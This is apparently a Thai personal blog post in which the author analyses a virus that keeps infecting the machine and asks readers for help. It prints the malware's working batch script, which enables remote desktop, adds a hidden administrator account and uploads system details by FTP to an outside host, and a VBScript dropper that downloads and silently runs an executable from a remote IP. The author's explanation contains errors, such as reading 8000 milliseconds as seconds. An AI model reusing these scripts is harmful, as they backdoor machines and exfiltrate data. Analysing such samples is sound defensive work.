เจอไวรัสเข้ามาป่วนหลายรอบแหละ งานนนี้เลยขอแกะรอยมันดูบ้าง
พบว่ามันสร้าง batch file เอาไว้สร้างตัวเองขึ้นมา ตามคำสั่งชุดนี้ครับ
cmd /c "@ipconfig >>3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt
net1 user sql 3297201 /add >>3389.txt
net1 localgroup administrators sql /add >>3389.txt
echo open hackewgs.3322.org> cmd.txt
echo binary >> cmd.txt
echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
del 3389.txt
del cmd.txt
del %0
exit
จะเห็นว่ามันทำงานหลายระดับมาก ตั้งแต่ เขียนคำสั่งไม่ให้เราเข้าไปแก้มันใน
registry ได้ แล้วใช้คำสั่งในการสร้างไฟล์ที่สุ่มชื่อขึ้นมา
และยังมี windows script file อีกตัว เป็นนามสกุล 360.vbs ดังรายละเอียดนี้ครับ
Set psp = CreateObject("Msxml2.XMLHTTP")
set ws=WScript.CreateObject("WScript.Shell")
psp.Open "GET","http://61.50.229.211:8080/1433.exe",0
psp.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(psp.responseBody)
aGet.SaveToFile "c:\1433.exe",2
wscript.sleep 8000
ws.Run "c:\1433.exe",0
อีกชุดคำสั่งนี้ มันจัดการเปิดพอร์ต ผ่าน shell script กันเห็นๆ ผ่าน service http พอร์ต 80 ที่เราไม่ได้ปิดเอาไว้อยู่แล้ว รับพรรคพวกเข้ามาเป็น 1433.exe และสั่งให้ทำงานหลังจากหยุดคำสั่งชั่วคราวที่ 8000 วินาที แล้วจึงโจมตี
โอ้ พระเจ้าจอร์จ มันโหดมาก.....
เอาเป็นว่า ESET NOD32 ที่มีอยู่ เป็นใบ้เลยครับ ไม่รู้ไม่ชี้ เหมือนทำท่าไม่รู้จัก ไฟล์ไวรัสนี้เลยครับ
ทำไงดีล่ะทีนี้ ช่วยหน่อยครับ....พี่น้อง งานเข้าเลยครับ
ไม่มีความคิดเห็น:
แสดงความคิดเห็น
ท่านสามารถแสดงข้อคิดเห็นที่เหมือน หรือ แตกต่างได้ครับ ขอความกรุณาใช้ถ้อยคำที่สุภาพด้วยครับ ขอบคุณครับ